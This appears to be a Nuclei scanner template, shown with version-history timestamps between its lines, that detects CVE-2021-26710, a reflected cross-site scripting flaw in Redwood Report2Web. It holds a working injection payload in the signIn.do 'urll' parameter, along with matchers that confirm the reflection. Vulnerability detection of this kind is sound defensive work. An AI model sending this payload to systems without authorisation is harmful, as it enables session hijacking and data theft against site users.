2021-02-09 12:58:32 +00:00
id : CVE-2021-26710
info :
2022-08-29 13:55:23 +00:00
name : Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting
2021-02-09 12:58:32 +00:00
author : pikpikcu
severity : medium
2022-08-29 13:55:23 +00:00
description : Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://vict0ni.me/report2web-xss-frame-injection.html
2022-05-17 09:18:12 +00:00
- https://vict0ni.me/redwood-report2web-xss-and-frame-injection/
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26710
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26710
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.00116
epss-percentile : 0.45321
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : redwood
product : report2web
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,redwood,xss
2021-02-09 12:58:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-09 12:58:32 +00:00
- method : GET
path :
- "{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-02-09 12:58:32 +00:00
words :
- "><script>alert(document.domain)</script>"
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-02-09 12:58:32 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4b0a00483046022100de4f3b4ed15065e56c997e9902b14cb33d4129c1fb25571d30298239f4010e06022100fa3448fec140203342018294e9bf58e1e1d07baf5de4a681410bfbfbef4c29f0:922c64590222798bb761d5b6d8e72950